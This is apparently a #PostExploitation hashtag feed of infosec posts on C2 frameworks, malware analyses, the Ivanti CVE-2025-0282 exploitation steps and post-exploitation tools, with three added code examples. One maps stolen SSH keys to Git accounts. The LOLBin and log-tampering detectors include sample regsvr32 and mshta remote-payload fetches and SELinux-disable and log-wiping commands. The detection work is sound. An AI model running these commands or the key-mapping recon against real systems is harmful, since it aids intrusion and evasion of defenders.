#PostExploitation

2026-03-07

If the Kardashians launched their own framework it would be Kommand and Kontrol (K2).

The Momager (Kris.exe or Kris.sh): The primary C2 listener.
The Glow Up: Privesc
Keeping Up: Lateral movement

#C2Framework #RedTeaming #PostExploitation #MalwareDevelopment #Infosec #CyberSecurity #EDRBypass #ActiveDirectory #PenTesting #ThreatHunting #MITREATTACK #APTHunting #Shellcode #ZeroDay #Persistence #Exfiltration #BlueTeam #PurpleTeaming #kardashians

Anant Shrivastava aka anantshri (anant@anantshri.info)
2025-08-22

Introducing KeyChecker – a CLI to fingerprint SSH private keys & map them to Git hosting accounts.

We have been talking about this in our classes for a long while, finally automation is present now.

Blog: https://cyfinoid.com/automating-a-known-weakness-introducing-keychecker/
PyPI: https://pypi.org/project/keychecker/

#bugbountytips #ssh #git #github #infosec #postexploitation
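How the private-key-to-account mapping in a tool like this works in general, as an added example that is not KeyChecker's own code: derive the public key from the found private key (`ssh-keygen -y -f <key>`), compute its SHA256 fingerprint exactly as `ssh-keygen -lf` does (SHA256 over the base64 wire blob, base64-encoded without padding), and compare it against the authorized_keys-style lines a hosting provider publishes for each user (GitHub serves them at https://github.com/<user>.keys). The keys below are constructed 32-byte placeholders, not real ed25519 keys, and the "published" dictionary stands in for the fetched `.keys` responses.

```python
import base64
import hashlib
import struct
from typing import Dict, List, Optional


def _ssh_string(data: bytes) -> bytes:
    """Encode one SSH wire-format string: uint32 big-endian length, then bytes."""
    return struct.pack(">I", len(data)) + data


def build_ed25519_pubkey_line(raw_pubkey: bytes, comment: str = "") -> str:
    """Build an authorized_keys-style line for an ed25519 public key.

    The wire blob is: string "ssh-ed25519", string <32 raw key bytes>.
    """
    if len(raw_pubkey) != 32:
        raise ValueError("ed25519 public keys are 32 bytes")
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(raw_pubkey)
    line = "ssh-ed25519 " + base64.b64encode(blob).decode("ascii")
    return (line + " " + comment).rstrip()


def fingerprint(pubkey_line: str) -> str:
    """SHA256 fingerprint of any OpenSSH public key line (rsa, ecdsa, ed25519).

    Same "SHA256:<base64 without padding>" form that `ssh-keygen -lf` prints,
    so the result can be compared with fingerprints from other tooling.
    """
    fields = pubkey_line.split()
    if len(fields) < 2:
        raise ValueError("not an OpenSSH public key line")
    blob = base64.b64decode(fields[1])
    # The first wire string inside the blob is the key type; it must match field 0.
    (type_len,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + type_len].decode("ascii") != fields[0]:
        raise ValueError("key type in blob does not match declared type")
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def match_key_to_accounts(pubkey_line: str,
                          published: Dict[str, List[str]]) -> Optional[str]:
    """Return the account whose published keys include this key, else None.

    Comparison is on fingerprints, so differing comments do not matter.
    """
    target = fingerprint(pubkey_line)
    for account, keys in published.items():
        if any(fingerprint(k) == target for k in keys):
            return account
    return None


# Constructed sample data (not real keys): fixed 32-byte values stand in for
# ed25519 public keys. In practice FOUND_KEY comes from
# `ssh-keygen -y -f <private key>` on the compromised host and PUBLISHED_KEYS
# from https://github.com/<user>.keys for each candidate user.
FOUND_KEY = build_ed25519_pubkey_line(bytes(range(32)), "root@compromised-host")
PUBLISHED_KEYS: Dict[str, List[str]] = {
    "alice": [build_ed25519_pubkey_line(bytes(range(32, 64)), "alice@laptop")],
    "bob": [
        build_ed25519_pubkey_line(bytes(range(32)), "bob@work"),
        build_ed25519_pubkey_line(bytes([7] * 32), "bob@home"),
    ],
}


def demo() -> Optional[str]:
    """Map the key found on the host to a hosting account (or None)."""
    return match_key_to_accounts(FOUND_KEY, PUBLISHED_KEYS)


if __name__ == "__main__":
    print(fingerprint(FOUND_KEY), "->", demo())
```

The check is deliberately fingerprint-based rather than string-based: the comment field on a found key (`root@compromised-host`) will never equal the comment the user uploaded, and the same is true of RSA keys stored in PEM versus OpenSSH form, so comparing the hashed wire blob is the only comparison that survives those differences.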

2025-06-24

Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.

@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.

Built for red teamers but abused by threat actors, this sample goes full dark mode:

  • Shellcode loader in C++
  • AES-encrypted payload
  • XOR junk code to slow reverse engineering
  • Dynamic API resolving
  • LOLBin delivery via regsvr32

It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)

🔗 Full breakdown:
fortinet.com/blog/threat-resea

TL;DR for blue teamers:

  • Havoc ≠ harmless just because it’s open source
  • Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
  • Watch for process injection + thread creation anomalies
  • Memory analysis > file-based detection here
  • Don’t assume your EDR is catching every beacon on port 443

Is it threat emulation or a real attack?

— Blue teamer having a full-blown identity crisis at 2am

Shoutout to @xpzhang and team for their amazing work!

#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
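The TL;DR above says to watch regsvr32, rundll32 and mshta; the following is an added hunting example over process-creation telemetry, written for this page and not taken from the Fortinet write-up or from Havoc. It encodes the well-known abuse shapes of those three binaries (regsvr32 pulling a remote scriptlet via `/i:<url>` with scrobj.dll, any of them loading a DLL or script from a user-writable directory, inline `javascript:`/`vbscript:` handlers) and escalates when the parent is an Office or scripting host. The event records are constructed, use Sysmon Event ID 1 field names, and point at a documentation IP range.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Each rule: (name, LOLBin image basename, case-insensitive command-line regex).
LOLBIN_RULES: List[Tuple[str, str, str]] = [
    ("regsvr32_remote_scriptlet", "regsvr32.exe",
     r"(?i)(/i:\s*(https?|ftp)://|scrobj\.dll)"),
    ("regsvr32_user_writable_dll", "regsvr32.exe",
     r"(?i)\\(temp|appdata|programdata|public|downloads)\\[^ ]+\.(dll|ocx)\b"),
    ("mshta_inline_or_remote", "mshta.exe",
     r"(?i)(https?://|javascript:|vbscript:)"),
    ("rundll32_inline_script", "rundll32.exe",
     r"(?i)(javascript:|vbscript:)"),
    ("rundll32_user_writable_dll", "rundll32.exe",
     r"(?i)\\(temp|appdata|programdata|public|downloads)\\[^ ,]+\.dll\b"),
]

# Parents that should rarely spawn these binaries directly.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Event) -> List[str]:
    """Return the names of every rule an event trips (empty list = no finding)."""
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = [name for name, lolbin, pattern in LOLBIN_RULES
            if image == lolbin and re.search(pattern, cmdline)]
    # Only escalate on the parent when a LOLBin rule already fired; otherwise
    # every installer that runs regsvr32 from cmd.exe would page someone.
    if hits and basename(event.get("ParentImage", "")) in SUSPICIOUS_PARENTS:
        hits.append("suspicious_parent")
    return hits


def hunt(events: List[Event]) -> List[Tuple[str, List[str]]]:
    """Return (ProcessId, rule names) for each event with at least one hit."""
    results = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            results.append((ev["ProcessId"], hits))
    return results


# Constructed sample events (hypothetical; not from the analysed sample).
SAMPLE_EVENTS: List[Event] = [
    {"ProcessId": "4012", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /u /i:http://203.0.113.10/update.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessId": "4020", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\Public\Libraries\loader.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": "4031", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/a.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": "4044", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\beacon.dll,DllMain",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Benign: a system DLL registered by an installer, and a Control Panel applet.
    {"ProcessId": "4050", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"ProcessId": "4061", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL hotplug.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for pid, rules in hunt(SAMPLE_EVENTS):
        print(pid, ", ".join(rules))
```

Process-creation rules like these catch the delivery stage only; as the post notes, the beacon itself lives in memory, so the complementary signal is injection and remote-thread telemetry (Sysmon Event ID 8/10) on whatever process regsvr32 or rundll32 hands off to.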

2025-05-16

Skitnet is shaking up the cybercrime scene—this stealthy ransomware tool is now powering high-stakes attacks by notorious groups. Ever wonder how hackers pull off such seamless heists? Dive into the story behind the tool that's rewriting the rules.

thedefendopsdiaries.com/skitne

#skitnet
#ransomware
#cybersecurity
#postexploitation
#blackbasta

2025-05-16

Skitnet is shaking up the ransomware scene with stealthy tactics and jaw-dropping capabilities—already in use by notorious gangs. What does this mean for our digital defenses? Dive into the details.

thedefendopsdiaries.com/skitne

#skitnet
#ransomware
#cybersecurity
#postexploitation
#blackbasta

Tom's IT Cafe (TomsITCafe)
2025-05-06

They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.

tomsitcafe.com/2025/05/06/livi

decio (decio@infosec.exchange)
2025-01-09

⚠️ New zero-day vulnerability targeting Ivanti Connect Secure VPNs (CVE-2025-0282)

#Mandiant has published the first signs of exploitation (with an initial attribution to UNC5337):

🔍 Common steps identified during exploitation:
1️⃣ Disables SELinux
2️⃣ Blocks syslog log forwarding
3️⃣ Remounts the disk read-write
4️⃣ Writes a malicious script
5️⃣ Executes that script
6️⃣ Deploys one or more web shells
7️⃣ Modifies the logs to hide the activity
8️⃣ Re-enables SELinux
9️⃣ Remounts the disk

🛑 Post-exploitation concealment techniques:

  • Suppression of kernel messages with dmesg and modification of debug logs.
  • Clearing of state dumps and core dumps from crashes.
  • Removal of entries related to syslog failures, internal ICT errors, crash traces and certificate errors.
  • Modification of the SELinux audit log to hide the executed commands.

💡 Additional observations:

CVE-2025-0282 affects several patch levels of ICS release 22.7R2.

Successful exploitation depends on the specific version.

Repeated requests to the VPN are observed before exploitation, probably to identify the version.

🗂️ Targeted files:
/dana-cached/hc/hc_launcher.22.7.2.2615.jar
/dana-cached/hc/hc_launcher.22.7.2.3191.jar
/dana-cached/hc/hc_launcher.22.7.2.3221.jar
/dana-cached/hc/hc_launcher.22.7.2.3431.jar

⚠️ Mandiant reports having observed signs of active in-the-wild exploitation since mid-December 2024.

"Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation"
👇
cloud.google.com/blog/topics/t

#CyberVeille #Ivanti #IoC #postexploitation
#attribution
#CVE_2025_0282 #CVE_2025_0283
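The nine steps above form a sequence that a collector outside the appliance can still correlate even when the on-box logs were cleaned. The following is an added example, written for this page and not from Mandiant or Ivanti, of a stateful detector over a command-audit excerpt: it tags the individual anti-forensics actions, tags any command that ran while SELinux was disabled and the disk was mounted read-write (the window in which the script and web shells are written), and reports gaps between consecutive records that would betray suppressed forwarding. The audit lines are constructed, and the concrete commands used to represent the steps (setenforce, an iptables rule dropping UDP/514, `mount -o remount`, `dmesg -c`, `sed -i` on /var/log) are my assumed representatives, not commands the post or Mandiant reported.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed command-audit excerpt (hypothetical data). Format assumed:
# "<ISO timestamp> uid=<n> cmd=<command line>".
SAMPLE_AUDIT = """\
2024-12-15T03:10:02 uid=0 cmd=/usr/sbin/setenforce 0
2024-12-15T03:10:05 uid=0 cmd=/sbin/iptables -A OUTPUT -p udp --dport 514 -j DROP
2024-12-15T03:10:09 uid=0 cmd=/bin/mount -o remount,rw /
2024-12-15T03:10:15 uid=0 cmd=/bin/sh /tmp/.x.sh
2024-12-15T03:10:40 uid=0 cmd=/bin/dmesg -c
2024-12-15T03:10:44 uid=0 cmd=/bin/sed -i /dana-na/d /var/log/messages
2024-12-15T03:10:50 uid=0 cmd=/bin/mount -o remount,ro /
2024-12-15T03:10:52 uid=0 cmd=/usr/sbin/setenforce 1
2024-12-15T03:42:10 uid=0 cmd=/bin/ls /data/var/dlogs
"""

LINE_RE = re.compile(r"^(\S+) uid=(\d+) cmd=(.*)$")

# Per-command anti-forensics patterns, one per step or concealment technique.
ANTI_FORENSICS: List[Tuple[str, str]] = [
    ("selinux_disabled", r"setenforce\s+0\b"),
    ("syslog_forwarding_blocked", r"iptables.*--dport\s+514\b"),
    ("remount_rw", r"mount\s+-o\s+remount,rw\b"),
    ("kernel_ring_cleared", r"dmesg\s+(-c|--clear)\b"),
    ("log_edited_in_place", r"sed\s+-i.*\s/var/log/"),
    ("crash_dumps_removed", r"\brm\s+.*(/var/crash|core)"),
]


def parse_line(line: str):
    """Return (timestamp, command) for a well-formed audit line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(3)


def analyse(audit_text: str,
            gap_threshold: timedelta = timedelta(minutes=15)
            ) -> Tuple[List[Dict[str, object]], List[Tuple[datetime, datetime]]]:
    """Tag anti-forensics commands, commands run in the tamper window, and gaps.

    Returns (findings, gaps). Each finding is {"ts", "cmd", "tags"}.
    """
    selinux_off = False   # set by "setenforce 0", cleared by "setenforce 1"
    disk_rw = False       # set by remount,rw, cleared by remount,ro
    prev_ts = None
    findings: List[Dict[str, object]] = []
    gaps: List[Tuple[datetime, datetime]] = []

    for raw in audit_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        ts, cmd = parsed
        if prev_ts is not None and ts - prev_ts > gap_threshold:
            gaps.append((prev_ts, ts))
        prev_ts = ts

        tags = [name for name, pat in ANTI_FORENSICS if re.search(pat, cmd)]
        if re.search(r"setenforce\s+1\b", cmd):
            selinux_off = False
            tags.append("selinux_reenabled")
        elif re.search(r"mount\s+-o\s+remount,ro\b", cmd):
            disk_rw = False
            tags.append("remount_ro")
        elif selinux_off and disk_rw and not tags:
            # Anything else executed with SELinux off and the disk writable is
            # exactly the "write script, run it, drop web shells" window.
            tags.append("run_in_tamper_window")
        if "selinux_disabled" in tags:
            selinux_off = True
        if "remount_rw" in tags:
            disk_rw = True
        if tags:
            findings.append({"ts": ts, "cmd": cmd, "tags": tags})
    return findings, gaps


def analyse_sample():
    return analyse(SAMPLE_AUDIT)


if __name__ == "__main__":
    found, missing = analyse_sample()
    for f in found:
        print(f["ts"].isoformat(), ", ".join(f["tags"]), "|", f["cmd"])
    for start, end in missing:
        print("gap:", start.isoformat(), "->", end.isoformat())
```

The state tracking is what makes this more than a keyword match: `/bin/sh /tmp/.x.sh` carries no suspicious string of its own, and only its position between the SELinux/remount bracketing steps marks it. The gap check is only meaningful on a copy of the records that the attacker could not edit, which is the reason the post's "blocks syslog forwarding" step matters for defenders.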

2023-03-23

Now that you’ve seen #WhatTheVuln Episode 2 featuring Lindsay Von Tish and Allan Cecil, check out the corresponding technical write-up where you can take a deep dive into how to use #LoLBins to bypass #EDR protection and install a #C2 agent for advanced #postexploitation control.

And don’t fret if you missed the initial livestream – you can watch the recording on demand! bfx.social/3K4T1mS


P.S. Episode 3 is on the way!

2022-12-10

How common is it for a PHP install to support curl_* functions or at least not have them filtered?
#pentesting #postexploitation #php

2022-12-05

Check out this list of #postexploitation tools we enjoy using in our #pentesting work, such as:

- Mimikatz
- PowerHub
- Bashark
- And Metasploit of course!

See the full list: bishopfox.com/blog/post-exploi

2022-11-21

During post-exploitation, how do you prefer to name/identify the systems?
#postexploitation #pentesting

2022-11-19

Other than MITRE ATT&CK which is very broad and exhaustive, is there an attribute list for "capabilities" or "functionality" (or whatever you want to call them) that exploits or payloads grant the user? I'm looking for things like command-exec, file-read, file-write, etc.
#infosec #taxonomy #postexploitation #mitreattck

Cypherpunk (cypherpunk)
2019-08-31

Find out what passwords are stored and where on your PC with LaZagne:
github.com/AlessandroZ/LaZagne

Wetz' OnlyFriends 🥵🔞 (markuswet@toot.io)
2018-12-12

"Ok, I just became domain admin..... so..... what now??"

#pentest #whitehathacking #postexploitation #activedirectory #domainadmin #postpostexploitstion
